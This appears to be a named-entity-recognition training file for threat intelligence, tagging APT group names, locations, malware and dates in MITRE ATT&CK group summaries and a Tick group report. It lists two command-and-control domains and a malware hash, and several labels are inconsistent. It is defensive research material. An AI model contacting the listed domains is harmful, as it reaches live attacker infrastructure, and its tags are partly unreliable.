+group O
+attributed O
+to O
+actors O
+operating O
+out O
+of O
+China S-LOC
+. O
+
+Ke3chang  S-APT
+has O
+targeted O
+several O
+industries O
+, O
+including O
+oil O
+, O
+government O
+, O
+military O
+, O
+and O
+more O
+. O
+
+Kimsuky S-APT
+: O
+Velvet B-APT
+Chollima E-APT
+. O
+
+Kimsuky S-APT
+is O
+a O
+North B-LOC
+Korean E-LOC
+based O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+September B-TIME
+2013 E-TIME
+. O
+
+The O
+group O
+focuses O
+on O
+targeting O
+Korean B-IDTY
+think I-IDTY
+tank E-IDTY
+as O
+well O
+as O
+DPRK/nuclear-related B-IDTY
+targets O
+. O
+
+The O
+group O
+was O
+attributed O
+as O
+the O
+actor O
+behind O
+the O
+Korea B-IDTY
+Hydro I-IDTY
+& I-IDTY
+Nuclear I-IDTY
+Power I-IDTY
+Co.compromise E-IDTY
+. O
+
+Lazarus B-APT
+Group E-APT
+: O
+HIDDEN B-APT
+COBRA E-APT
+, O
+Guardians B-APT
+of I-APT
+Peace E-APT
+, O
+ZINC S-APT
+, O
+NICKEL B-APT
+ACADEMY E-APT
+. O
+
+Lazarus B-APT
+Group E-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+the O
+North B-IDTY
+Korean I-IDTY
+government E-IDTY
+. O
+
+The O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+2009 S-TIME
+and O
+was O
+reportedly O
+responsible O
+for O
+the O
+November B-TIME
+2014 E-TIME
+destructive O
+wiper B-ACT
+attack E-ACT
+against O
+Sony B-IDTY
+Pictures I-IDTY
+Entertainment E-IDTY
+as O
+part O
+of O
+a O
+campaign O
+named O
+Operation B-ACT
+Blockbuster E-ACT
+by O
+Novetta S-SECTEAM
+. O
+
+Malware O
+used O
+by O
+Lazarus B-APT
+Group E-APT
+correlates O
+to O
+other O
+reported O
+campaigns O
+, O
+including O
+Operation B-MAL
+Flame E-MAL
+, O
+Operation B-MAL
+1Mission E-MAL
+, O
+Operation B-MAL
+Troy E-MAL
+, O
+DarkSeoul S-MAL
+, O
+and O
+Ten B-MAL
+Days I-MAL
+of I-MAL
+Rain E-MAL
+. O
+
+In O
+late B-TIME
+2017 E-TIME
+, O
+Lazarus B-APT
+Group E-APT
+used O
+KillDisk S-MAL
+, O
+a O
+disk-wiping O
+tool O
+, O
+in O
+an O
+attack O
+against O
+an O
+online O
+casino O
+based O
+in O
+Central B-LOC
+America E-LOC
+. O
+
+North B-LOC
+Korean E-LOC
+group O
+definitions O
+are O
+known O
+to O
+have O
+significant O
+overlap O
+, O
+and O
+the O
+name O
+Lazarus B-APT
+Group E-APT
+is O
+known O
+to O
+encompass O
+a O
+broad O
+range O
+of O
+activity O
+. O
+
+Some O
+organizations O
+use O
+the O
+name O
+Lazarus B-APT
+Group E-APT
+to O
+refer O
+to O
+any O
+activity O
+attributed O
+to O
+North B-LOC
+Korea E-LOC
+. O
+
+Some O
+organizations O
+track O
+North B-LOC
+Korean E-LOC
+clusters O
+or O
+groups O
+such O
+as O
+Bluenoroff S-APT
+, O
+APT37 S-APT
+, O
+and O
+APT38 S-APT
+separately O
+, O
+while O
+other O
+organizations O
+may O
+track O
+some O
+activity O
+associated O
+with O
+those O
+group O
+names O
+by O
+the O
+name O
+Lazarus B-APT
+Group E-APT
+. O
+
+Leafminer S-APT
+: O
+Raspite S-APT
+. O
+
+Leafminer S-APT
+is O
+an O
+Iranian S-LOC
+threat O
+group O
+that O
+has O
+targeted O
+government O
+organizations O
+and O
+business O
+entities O
+in O
+the O
+Middle B-IDTY
+East E-IDTY
+since O
+at O
+least O
+early B-TIME
+2017 E-TIME
+. O
+
+Elderwood S-APT
+: O
+Elderwood B-APT
+Gang E-APT
+, O
+Beijing B-APT
+Group E-APT
+, O
+Sneaky B-APT
+Panda E-APT
+. O
+
+Elderwood S-APT
+is O
+a O
+suspected O
+Chinese O
+cyber O
+espionage O
+group O
+that O
+was O
+reportedly O
+responsible O
+for O
+the O
+2009 S-TIME
+Google S-IDTY
+intrusion O
+known O
+as O
+Operation O
+Aurora O
+. O
+
+The O
+group O
+has O
+targeted O
+defense B-IDTY
+organizations E-IDTY
+, O
+supply O
+chain O
+manufacturers O
+, O
+human O
+rights O
+and O
+nongovernmental O
+organizations O
+( O
+NGOs O
+) O
+, O
+and O
+IT O
+service O
+providers O
+. O
+
+Equation S-APT
+is O
+a O
+sophisticated O
+threat O
+group O
+that O
+employs O
+multiple O
+remote B-MAL
+access I-MAL
+tools E-MAL
+. O
+
+The O
+group O
+is O
+known O
+to O
+use O
+zero-day B-VULNAME
+exploits E-VULNAME
+and O
+has O
+developed O
+the O
+capability O
+to O
+overwrite O
+the O
+firmware O
+of O
+hard O
+disk O
+drives O
+. O
+
+FIN10 S-APT
+is O
+a O
+financially O
+motivated O
+threat O
+group O
+that O
+has O
+targeted O
+organizations O
+in O
+North B-LOC
+America E-LOC
+since O
+at O
+least O
+2013 S-TIME
+through O
+2016 S-TIME
+. O
+
+The O
+group O
+uses O
+stolen O
+data O
+exfiltrated O
+from O
+victims O
+to O
+extort O
+organizations O
+. O
+
+Orangeworm S-APT
+is O
+a O
+group O
+that O
+has O
+targeted O
+organizations O
+in O
+the O
+healthcare O
+sector O
+in O
+the B-LOC
+United I-LOC
+States E-LOC
+, O
+Europe S-LOC
+, O
+and O
+Asia S-LOC
+since O
+at O
+least O
+2015 S-TIME
+, O
+likely O
+for O
+the O
+purpose O
+of O
+corporate O
+espionage O
+. O
+
+Patchwork S-APT
+: O
+Dropping B-APT
+Elephant E-APT
+, O
+Chinastrats S-APT
+, O
+MONSOON S-APT
+, O
+Operation B-APT
+Hangover E-APT
+. O
+
+Patchwork S-APT
+is O
+a O
+cyberespionage O
+group O
+that O
+was O
+first O
+observed O
+in O
+December B-TIME
+2015 E-TIME
+. O
+
+While O
+the O
+group O
+has O
+not O
+been O
+definitively O
+attributed O
+, O
+circumstantial O
+evidence O
+suggests O
+the O
+group O
+may O
+be O
+a O
+pro-Indian O
+or O
+Indian O
+entity O
+. O
+
+Patchwork S-APT
+has O
+been O
+seen O
+targeting O
+industries O
+related O
+to O
+diplomatic S-IDTY
+and O
+government B-IDTY
+agencies E-IDTY
+. O
+
+Much O
+of O
+the O
+code O
+used O
+by O
+this O
+group O
+was O
+copied O
+and O
+pasted O
+from O
+online O
+forums O
+. O
+
+Patchwork S-APT
+was O
+also O
+seen O
+operating O
+spearphishing S-ACT
+campaigns O
+targeting O
+U.S. S-LOC
+think O
+tank O
+groups O
+in O
+March B-TIME
+and I-TIME
+April I-TIME
+of I-TIME
+2018 E-TIME
+. O
+
+PittyTiger S-APT
+is O
+a O
+threat O
+group O
+believed O
+to O
+operate O
+out O
+of O
+China S-LOC
+that O
+uses O
+multiple O
+different O
+types O
+of O
+malware O
+to O
+maintain O
+command O
+and O
+control O
+. O
+
+Unknown O
+. O
+
+Release_Time O
+: O
+unknow O
+Report_URL O
+: O
+https://attack.mitre.org/groups/ O
+APT19 S-APT
+： O
+Codoso S-APT
+, O
+C0d0so0 S-APT
+, O
+Codoso B-APT
+Team E-APT
+, O
+Sunshop B-APT
+Group E-APT
+. O
+
+APT19 S-APT is
+a O
+Chinese-based O
+threat O
+group O
+that O
+has O
+targeted O
+a O
+variety O
+of O
+industries O
+, O
+including O
+defense O
+, O
+finance O
+, O
+energy O
+, O
+pharmaceutical O
+, O
+telecommunications O
+, O
+high O
+tech O
+, O
+education O
+, O
+manufacturing O
+, O
+and O
+legal O
+services O
+. O
+
+In O
+2017 S-TIME
+, O
+a O
+phishing B-ACT
+campaign E-ACT
+was O
+used O
+to O
+target O
+seven O
+law O
+and O
+investment O
+firms O
+. O
+
+Some O
+analysts O
+track APT19 S-APT and Deep B-APT
+Panda E-APT as
+the O
+same O
+group O
+, O
+but O
+it O
+is O
+unclear O
+from O
+open O
+source O
+information O
+if O
+the O
+groups O
+are O
+the O
+same O
+. O
+
+APT28 S-APT
+: O
+SNAKEMACKEREL S-APT
+, O
+Swallowtail S-APT
+, O
+Group B-APT
+74 E-APT
+, O
+Sednit S-APT
+, O
+Sofacy S-APT
+, O
+Pawn B-APT
+Storm E-APT
+, O
+Fancy B-APT
+Bear E-APT
+, O
+STRONTIUM S-APT
+, O
+Tsar B-APT
+Team E-APT
+, O
+Threat B-APT
+Group-4127 E-APT
+, O
+TG-4127 S-APT
+. O
+
+APT28 S-APT is
+a O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+Russia's B-IDTY
+Main I-IDTY
+Intelligence I-IDTY
+Directorate I-IDTY
+of I-IDTY
+the I-IDTY
+Russian I-IDTY
+General I-IDTY
+Staff E-IDTY
+by O
+a O
+July B-TIME
+2018 E-TIME
+U.S. B-IDTY
+Department I-IDTY
+of I-IDTY
+Justice E-IDTY
+indictment O
+. O
+
+This O
+group O
+reportedly O
+compromised O
+the O
+Hillary O
+Clinton O
+campaign O
+, O
+the O
+Democratic B-IDTY
+National I-IDTY
+Committee E-IDTY
+, O
+and O
+the O
+Democratic B-IDTY
+Congressional I-IDTY
+Campaign I-IDTY
+Committee E-IDTY
+in O
+2016 S-TIME
+in O
+an O
+attempt O
+to O
+interfere O
+with O
+the O
+U.S. S-LOC
+presidential O
+election O
+. O
+
+APT28 S-APT 
+has O
+been O
+active O
+since O
+at O
+least O
+2004 S-TIME
+. O
+
+APT29 S-APT
+: O
+YTTRIUM S-APT
+, O
+The B-APT
+Dukes E-APT
+, O
+Cozy B-APT
+Bear E-APT
+, O
+CozyDuke S-APT
+. O
+
+APT29 S-APT 
+is O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+the O
+Russian B-IDTY
+government E-IDTY
+and O
+has O
+operated O
+since O
+at O
+least O
+2008 S-TIME
+. O
+
+This O
+group O
+reportedly O
+compromised O
+the O
+Democratic B-IDTY
+National I-IDTY
+Committee E-IDTY
+starting O
+in O
+the O
+summer O
+of O
+2015 S-TIME
+. O
+
+PLATINUM S-APT
+is O
+an O
+activity O
+group O
+that O
+has O
+targeted O
+victims O
+since O
+at O
+least O
+2009 S-TIME
+. O
+
+The O
+group O
+has O
+focused O
+on O
+targets O
+associated O
+with O
+governments S-IDTY
+and O
+related O
+organizations S-IDTY
+in O
+South B-LOC
+and I-LOC
+Southeast I-LOC
+Asia E-LOC
+. O
+
+Poseidon B-APT
+Group E-APT
+is O
+a O
+Portuguese-speaking O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2005 S-TIME
+. O
+
+The O
+group O
+has O
+a O
+history O
+of O
+using O
+information O
+exfiltrated O
+from O
+victims O
+to O
+blackmail O
+victim O
+companies O
+into O
+contracting O
+the O
+Poseidon B-APT
+Group E-APT
+as O
+a O
+security O
+firm O
+. O
+
+PROMETHIUM S-APT
+is O
+an O
+activity O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2012 S-TIME
+. O
+
+The O
+group O
+conducted O
+a O
+campaign O
+in O
+May B-TIME
+2016 E-TIME
+and O
+has O
+heavily O
+targeted O
+Turkish O
+victims O
+. O
+
+PROMETHIUM S-APT
+has O
+demonstrated O
+similarity O
+to O
+another O
+activity O
+group O
+called O
+NEODYMIUM S-APT
+due O
+to O
+overlapping O
+victim O
+and O
+campaign O
+characteristics O
+. O
+
+APT33 S-APT
+：O
+Elfin S-APT
+APT33 S-APT
+is O
+a O
+suspected O
+Iranian S-LOC
+threat O
+group O
+that O
+has O
+carried O
+out O
+operations O
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+The O
+group O
+has O
+targeted O
+organizations O
+across O
+multiple O
+industries O
+in O
+the O
+United B-LOC
+States E-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+and O
+South B-LOC
+Korea E-LOC
+, O
+with O
+a O
+particular O
+interest O
+in O
+the O
+aviation O
+and O
+energy O
+sectors O
+. O
+
+APT37 S-APT
+：O
+ScarCruft S-APT
+, O
+Reaper S-APT
+, O
+Group123 S-APT
+, O
+TEMP.Reaper S-APT
+APT37 S-APT
+is O
+a O
+suspected O
+North B-LOC
+Korean E-LOC
+cyber O
+espionage O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2012 S-TIME
+. O
+
+The O
+group O
+has O
+targeted O
+victims O
+primarily O
+in O
+South B-LOC
+Korea E-LOC
+, O
+but O
+also O
+in O
+Japan S-LOC
+, O
+Vietnam S-LOC
+, O
+Russia S-LOC
+, O
+Nepal S-LOC
+, O
+China S-LOC
+, O
+India S-LOC
+, O
+Romania S-LOC
+, O
+Kuwait S-LOC
+, O
+and O
+other O
+parts O
+of O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+APT37 S-APT
+has O
+also O
+been O
+linked O
+to O
+following O
+campaigns O
+between O
+2016-2018 S-TIME
+: O
+Operation B-ACT
+Daybreak E-ACT
+, O
+Operation B-ACT
+Erebus E-ACT
+, O
+Golden B-ACT
+Time E-ACT
+, O
+Evil B-ACT
+New I-ACT
+Year E-ACT
+, O
+Are B-ACT
+you I-ACT
+Happy? E-ACT
+, O
+FreeMilk S-ACT
+, O
+Northern B-ACT
+Korean I-ACT
+Human I-ACT
+Rights E-ACT
+, O
+and O
+Evil B-ACT
+New I-ACT
+Year I-ACT
+2018 E-ACT
+. O
+
+APT38 S-APT
+：O
+APT38 S-APT
+is O
+a O
+financially-motivated O
+threat O
+group O
+that O
+is O
+backed O
+by O
+the O
+North B-LOC
+Korean E-LOC
+regime O
+. O
+
+The O
+group O
+mainly O
+targets O
+banks O
+and O
+financial O
+institutions O
+and O
+has O
+targeted O
+more O
+than O
+16 O
+organizations O
+in O
+at O
+least O
+13 O
+countries O
+since O
+at O
+least O
+2014 S-TIME
+. O
+APT3 S-APT
+: O
+Gothic B-APT
+Panda E-APT
+, O
+Pirpi S-APT
+, O
+UPS B-APT
+Team E-APT
+, O
+Buckeye S-APT
+, O
+Threat B-APT
+Group-0110 E-APT
+, O
+TG-0110 S-APT
+. O
+
+APT3 S-APT
+is O
+a O
+China S-LOC
+based O
+threat O
+group O
+that O
+researchers O
+have O
+attributed O
+to O
+China's B-SECTEAM
+Ministry I-SECTEAM
+of I-SECTEAM
+StateSecurity E-SECTEAM
+. O
+
+This O
+group O
+is O
+responsible O
+for O
+the O
+campaigns O
+known O
+as O
+Operation B-ACT
+Clandestine I-ACT
+Fox E-ACT
+, O
+Operation B-ACT
+Clandestine I-ACT
+Wolf E-ACT
+, O
+and O
+Operation B-ACT
+Double I-ACT
+Tap E-ACT
+. O
+
+As O
+of O
+June B-TIME
+2015 E-TIME
+, O
+the O
+group O
+appears O
+to O
+have O
+shifted O
+from O
+targeting O
+primarily O
+US S-LOC
+victims O
+to O
+primarily O
+political O
+organizations O
+in O
+Hong B-LOC
+Kong E-LOC
+. O
+
+MITRE S-IDTY
+has O
+also O
+developed O
+an O
+APT3 S-APT
+Adversary O
+Emulation O
+Plan O
+. O
+
+APT30 S-APT
+is O
+a O
+threat O
+group O
+suspected O
+to O
+be O
+associated O
+with O
+the O
+Chinese B-IDTY
+government E-IDTY
+. O
+
+While O
+Naikon S-APT
+shares O
+some O
+characteristics O
+with O
+APT30 S-APT
+, O
+the O
+two O
+groups O
+do O
+not O
+appear O
+to O
+be O
+exact O
+matches O
+. O
+
+APT32 S-APT
+: O
+SeaLotus S-APT
+, O
+OceanLotus S-APT
+, O
+APT-C-00 S-APT
+. O
+
+APT32 S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+The O
+group O
+has O
+targeted O
+multiple O
+private O
+sector O
+industries O
+as O
+well O
+as O
+with O
+foreign O
+governments O
+, O
+dissidents O
+, O
+and O
+journalists O
+with O
+a O
+strong O
+focus O
+on O
+Southeast O
+Asian O
+countries O
+like O
+Vietnam S-LOC
+, O
+the B-LOC
+Philippines E-LOC
+, O
+Laos S-LOC
+, O
+and O
+Cambodia S-LOC
+. O
+
+They O
+have O
+extensively O
+used O
+strategic B-TOOL
+web I-TOOL
+compromises E-TOOL
+to O
+compromise O
+victims O
+. O
+
+The O
+group O
+is O
+believed O
+to O
+be O
+Vietnam S-LOC
+based O
+. O
+
+FIN7 S-APT
+: O
+Carbanak B-APT
+Group E-APT
+. O
+
+FIN7 S-APT
+is O
+a O
+financially-motivated O
+threat O
+group O
+that O
+has O
+primarily O
+targeted O
+the O
+U.S. S-LOC
+retail O
+, O
+restaurant O
+, O
+and O
+hospitality O
+sectors O
+since O
+mid-2015 S-TIME
+. O
+
+They O
+often O
+use O
+point-of-sale S-TOOL
+malware O
+. O
+
+A O
+portion O
+of O
+FIN7 S-APT
+was O
+run O
+out O
+of O
+a O
+front O
+company O
+called O
+Combi B-IDTY
+Security E-IDTY
+. O
+
+FIN7 S-APT
+is O
+sometimes O
+referred O
+to O
+as O
+Carbanak B-APT
+Group E-APT
+, O
+but O
+these O
+appear O
+to O
+be O
+two O
+groups O
+using O
+the O
+same O
+Carbanak S-MAL
+malware O
+and O
+are O
+therefore O
+tracked O
+separately O
+. O
+
+FIN8 S-APT
+is O
+a O
+financially O
+motivated O
+threat O
+group O
+known O
+to O
+launch O
+tailored O
+spearphishing S-ACT
+campaigns O
+targeting O
+the O
+retail O
+, O
+restaurant O
+, O
+and O
+hospitality O
+industries O
+. O
+
+Gallmaker S-APT
+is O
+a O
+cyberespionage O
+group O
+that O
+has O
+targeted O
+victims O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+has O
+been O
+active O
+since O
+at O
+least O
+December B-TIME
+2017 E-TIME
+. O
+
+The O
+group O
+has O
+mainly O
+targeted O
+victims O
+in O
+the O
+defense O
+, O
+military O
+, O
+and O
+government O
+sectors O
+. O
+
+DarkHydrus  S-APT 
+is O
+a O
+threat O
+group O
+that O
+has O
+targeted O
+government O
+agencies O
+and O
+educational O
+institutions O
+in O
+the O
+Middle B-LOC
+East E-LOC
+since O
+at O
+least O
+2016 S-TIME
+. O
+
+The O
+group O
+heavily O
+leverages O
+open-source O
+tools O
+and O
+custom O
+payloads O
+for O
+carrying O
+out O
+attacks O
+. O
+
+Deep B-APT
+Panda E-APT
+: O
+Shell B-APT
+Crew E-APT
+, O
+WebMasters S-APT
+, O
+KungFu B-APT
+Kittens E-APT
+, O
+PinkPanther S-APT
+, O
+Black B-APT
+Vine E-APT
+. O
+
+Deep B-APT
+Panda E-APT
+is O
+a O
+suspected O
+Chinese O
+threat O
+group O
+known O
+to O
+target O
+many O
+industries O
+, O
+including O
+government O
+, O
+defense O
+, O
+financial O
+, O
+and O
+telecommunications O
+. O
+
+The O
+intrusion O
+into O
+healthcare O
+company O
+Anthem S-IDTY
+has O
+been O
+attributed O
+to Deep B-APT
+Panda E-APT
+. O
+
+This O
+group O
+is O
+also O
+known O
+as O
+Shell B-APT
+Crew E-APT
+, O
+WebMasters S-APT
+, O
+KungFu B-APT
+Kittens E-APT
+, O
+and O
+PinkPanther S-APT
+. O
+
+Deep B-APT
+Panda E-APT also
+appears O
+to O
+be O
+known O
+as O
+Black B-APT
+Vine E-APT
+based O
+on O
+the O
+attribution O
+of O
+both O
+group O
+names O
+to O
+the O
+Anthem S-IDTY
+intrusion O
+. O
+
+Some O
+analysts O
+track Deep B-APT
+Panda E-APT
+and O
+APT19 S-APT
+as O
+the O
+same O
+group O
+, O
+but O
+it O
+is O
+unclear O
+from O
+open O
+source O
+information O
+if O
+the O
+groups O
+are O
+the O
+same O
+. O
+
+Dragonfly S-APT
+: O
+Energetic B-APT
+Bear E-APT
+. O
+
+Dragonfly  S-APT 
+is O
+a O
+cyber O
+espionage O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2011 S-TIME
+. O
+
+They O
+initially O
+targeted O
+defense O
+and O
+aviation O
+companies O
+but O
+shifted O
+to O
+focus O
+on O
+the O
+energy O
+sector O
+in O
+early O
+2013 S-TIME
+. O
+
+They O
+have O
+also O
+targeted O
+companies O
+related O
+to O
+industrial O
+control O
+systems O
+. O
+
+A O
+similar O
+group O
+emerged O
+in O
+2015 S-TIME
+and O
+was O
+identified O
+by O
+Symantec S-IDTY
+as O
+Dragonfly B-APT
+2.0 E-APT
+. O
+
+There O
+is O
+debate O
+over O
+the O
+extent O
+of O
+the O
+overlap O
+between O
+Dragonfly S-APT
+and O
+Dragonfly B-APT
+2.0 E-APT
+, O
+but O
+there O
+is O
+sufficient O
+evidence O
+to O
+lead O
+to O
+these O
+being O
+tracked O
+as O
+two O
+separate O
+groups O
+. O
+
+Dragonfly B-APT
+2.0 E-APT
+: O
+Berserk B-APT
+Bear E-APT
+. O
+
+Dragonfly B-APT
+2.0 E-APT
+is O
+a O
+suspected O
+Russian S-LOC
+group O
+that O
+has O
+targeted O
+government B-IDTY
+entities E-IDTY
+and O
+multiple O
+U.S. S-LOC
+critical B-IDTY
+infrastructure I-IDTY
+sectors E-IDTY
+since O
+at O
+least O
+March B-TIME
+2016 E-TIME
+. O
+
+There O
+is O
+debate O
+over O
+the O
+extent O
+of O
+overlap O
+between O
+Dragonfly B-APT
+2.0 E-APT
+and O
+Dragonfly S-APT
+, O
+but O
+there O
+is O
+sufficient O
+evidence O
+to O
+lead O
+to O
+these O
+being O
+tracked O
+as O
+two O
+separate O
+groups O
+. O
+
+DragonOK S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+targeted O
+Japanese S-LOC
+organizations S-IDTY
+with O
+phishing B-ACT
+emails E-ACT
+. O
+
+Due O
+to O
+overlapping O
+TTPs O
+, O
+including O
+similar O
+custom O
+tools O
+, O
+DragonOK S-APT
+is O
+thought O
+to O
+have O
+a O
+direct O
+or O
+indirect O
+relationship O
+with O
+the O
+threat O
+group Moafee S-APT
+. O
+
+It O
+is O
+known O
+to O
+use O
+a O
+variety O
+of O
+malware O
+, O
+including O
+Sysget S-MAL
+/ O
+HelloBridge S-MAL
+, O
+PlugX S-MAL
+, O
+PoisonIvy S-MAL
+, O
+FormerFirstRat S-MAL
+, O
+NFlog S-MAL
+, O
+and O
+NewCT S-MAL
+. O
+
+Dust B-APT
+Storm E-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+targeted O
+multiple O
+industries O
+in O
+Japan S-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+the O
+United B-LOC
+States E-LOC
+, O
+Europe S-LOC
+, O
+and O
+several O
+Southeast B-LOC
+Asian I-LOC
+countries E-LOC
+. O
+
+CopyKittens  S-APT 
+is O
+an O
+Iranian O
+cyber O
+espionage O
+group O
+that O
+has O
+been O
+operating O
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+It O
+has O
+targeted O
+countries O
+including O
+Israel S-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+Turkey S-LOC
+, O
+the O
+U.S. S-LOC
+, O
+Jordan S-LOC
+, O
+and O
+Germany S-LOC
+. O
+
+Tick S-APT
+Group O
+Continues O
+Attacks O
+. O
+
+The O
+" O
+Tick S-APT
+" O
+group O
+has O
+conducted O
+cyber B-ACT
+espionage I-ACT
+attacks E-ACT
+against O
+organizations O
+in O
+the O
+Republic B-LOC
+of I-LOC
+Korea I-LOC
+and I-LOC
+Japan E-LOC
+for O
+several O
+years O
+. O
+
+The O
+group O
+focuses O
+on O
+companies O
+that O
+have O
+intellectual O
+property O
+or O
+sensitive O
+information O
+like O
+those O
+in O
+the O
+Defense B-IDTY
+and I-IDTY
+High-Tech E-IDTY
+industries O
+. O
+
+The O
+group O
+is O
+known O
+to O
+use O
+custom O
+malware O
+called O
+Daserf S-MAL
+, O
+but O
+also O
+employs O
+multiple B-TOOL
+commodity E-TOOL
+and O
+custom B-TOOL
+tools E-TOOL
+, O
+exploit O
+vulnerabilities S-VULNAME
+, O
+and O
+use O
+social B-TOOL
+engineering I-TOOL
+techniques E-TOOL
+. O
+
+With O
+multiple B-TOOL
+tools E-TOOL
+and O
+anonymous B-TOOL
+infrastructure E-TOOL
+, O
+they O
+are O
+running O
+longstanding O
+and O
+persistent O
+attack B-ACT
+campaigns E-ACT
+. O
+
+We O
+have O
+observed O
+that O
+the O
+adversary O
+has O
+repeatedly O
+attacked O
+a O
+high-profile O
+target O
+in O
+Japan S-LOC
+using O
+multiple O
+malware B-MAL
+families E-MAL
+for O
+the O
+last O
+three O
+years O
+. O
+
+Symantec S-SECTEAM
+was O
+first O
+to O
+publicly O
+report O
+on O
+Tick S-APT
+, O
+followed O
+by O
+LAC S-SECTEAM
+in O
+2016 S-TIME
+. O
+
+These O
+reports O
+discussed O
+the O
+group O
+’s O
+malware O
+, O
+Daserf S-MAL
+( O
+a.k.a O
+Muirim S-MAL
+or O
+Nioupale S-MAL
+) O
+and O
+some O
+additional O
+downloader O
+programs O
+. O
+
+Though O
+Daserf S-MAL
+wasn’t O
+a O
+popular O
+attack O
+tool O
+at O
+the O
+time O
+of O
+publishing O
+the O
+two O
+reports O
+, O
+it O
+dates O
+back O
+to O
+at O
+least O
+2011 S-TIME
+. O
+
+Using O
+AutoFocus S-SECTEAM
+, O
+we O
+were O
+able O
+to O
+identify O
+the O
+link O
+among O
+Daserf S-MAL
+and O
+two O
+other O
+threats O
+, O
+9002 S-MAL
+and O
+Invader S-MAL
+. O
+
+These O
+threats O
+shared O
+infrastructure O
+between O
+July B-TIME
+2012 E-TIME
+and O
+April B-TIME
+2013 E-TIME
+. O
+
+Invader S-MAL
+( O
+a.k.a O
+Kickesgo S-MAL
+) O
+is O
+a O
+backdoor O
+that O
+injects O
+its O
+main O
+code O
+into O
+a O
+legitimate O
+process O
+, O
+such O
+as O
+explorer.exe S-FILE
+, O
+and O
+has O
+following O
+functions O
+: O
+
+Logs O
+keystrokes O
+and O
+mouse O
+movement O
+Captures O
+screenshots O
+Opens O
+cmd.exe S-FILE
+shell O
+Enumerates O
+processes O
+Executes O
+programs O
+Removes O
+itself O
+Enumerates O
+all O
+opening O
+TCP S-PROT
+and O
+UDP O
+ports O
+. O
+
+9002 S-MAL
+is O
+the O
+infamous O
+RAT O
+frequently O
+seen O
+in O
+targeted O
+attacks O
+reported O
+by O
+various O
+security O
+vendors O
+, O
+including O
+Palo B-SECTEAM
+Alto I-SECTEAM
+Networks E-SECTEAM
+. O
+
+Interestingly O
+, O
+the O
+C2 S-TOOL
+servers O
+linking O
+9002 S-MAL
+to O
+Daserf S-MAL
+were O
+described O
+in O
+the O
+report O
+of O
+an O
+Adobe B-TOOL
+Flash E-TOOL
+Zero-day S-VULNAME
+attack O
+from O
+FireEye S-SECTEAM
+in O
+2013 S-TIME
+. O
+
+These O
+domains O
+were O
+registered O
+through O
+the O
+privacy O
+protection O
+services O
+in O
+2008 S-TIME
+and O
+2011 S-TIME
+. O
+
+krjregh.sacreeflame.com S-DOM
+lywja.healthsvsolu.com S-DOM
+. O
+
+Though O
+we O
+don’t O
+know O
+the O
+targets O
+of O
+these O
+malware O
+samples O
+at O
+the O
+time O
+of O
+writing O
+this O
+article O
+, O
+we O
+suspect O
+the O
+same O
+group O
+is O
+behind O
+these O
+threats O
+for O
+a O
+number O
+of O
+reasons O
+. O
+
+The O
+samples O
+of O
+Daserf S-MAL
+that O
+shared O
+infrastructure O
+were O
+submitted O
+to O
+VirusTotal S-SECTEAM
+only O
+from O
+Japan S-LOC
+multiple O
+times O
+in O
+2013 S-TIME
+. O
+
+As O
+noted O
+in O
+a O
+later O
+section O
+, O
+another O
+Invader S-MAL
+sample O
+shared O
+different O
+C2 S-TOOL
+servers O
+with O
+Daserf S-MAL
+. O
+
+Symantec S-SECTEAM
+reported O
+that O
+Tick S-APT
+exploited O
+additional O
+Adobe B-TOOL
+Flash E-TOOL
+and O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerabilities S-VULNAME
+. O
+
+SecureWorks S-SECTEAM
+said O
+the O
+adversary O
+group O
+is O
+abusing O
+a O
+previously B-VULNAME
+undisclosed I-VULNAME
+vulnerability E-VULNAME
+in O
+Japanese O
+Software O
+Asset O
+Management O
+system O
+on O
+endpoints O
+. O
+
+Therefore O
+, O
+Tick S-APT
+or O
+their O
+digital O
+quartermaster O
+is O
+capable O
+of O
+deploying O
+new O
+and O
+unique O
+exploits O
+. O
+
+In O
+July O
+2016 O
+, O
+we O
+identified O
+a O
+compromised O
+website O
+in O
+Japan S-LOC
+that O
+was O
+hosting O
+a O
+Daserf B-MAL
+variant E-MAL
+. O
+
+The O
+web O
+server O
+was O
+also O
+a O
+C2 S-TOOL
+server O
+for O
+another O
+threat O
+, O
+Minzen S-MAL
+( O
+a.k.a O
+, O
+XXMM S-MAL
+, O
+Wali S-MAL
+, O
+or O
+ShadowWali S-MAL
+) O
+. O
+
+The O
+threat O
+often O
+uses O
+compromised O
+web O
+servers O
+in O
+Japan S-LOC
+and O
+the O
+Republic B-LOC
+of I-LOC
+Korea E-LOC
+. O
+
+As O
+Kaspersky S-SECTEAM
+and O
+Cybereason S-SECTEAM
+recently O
+posted O
+, O
+Minzen S-MAL
+is O
+a O
+modular O
+malware O
+that O
+has O
+both O
+32-bit O
+and O
+64-bit O
+components O
+in O
+its O
+resource O
+section O
+or O
+configuration O
+data O
+in O
+its O
+body O
+. O
+
+One O
+of O
+the O
+Minzen S-MAL
+samples O
+( O
+SHA256 S-ENCR
+: O
+9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 S-SHA2
+) O
+found O
+in O
+the O
+Republic B-LOC
+of I-LOC
+Korea E-LOC
+in O
+December B-TIME
+2016 E-TIME
+installs O
+simple O
+backdoor O
+module O
+as O
+a O
+final O
+payload O
+on O
+a O
+compromised O
+computer O
+. O
+
+It O
+opens O
+a O
+TCP S-PROT
+port O
+and O
+receives O
+commands O
+from O
+a O
+remote O
+attacker O
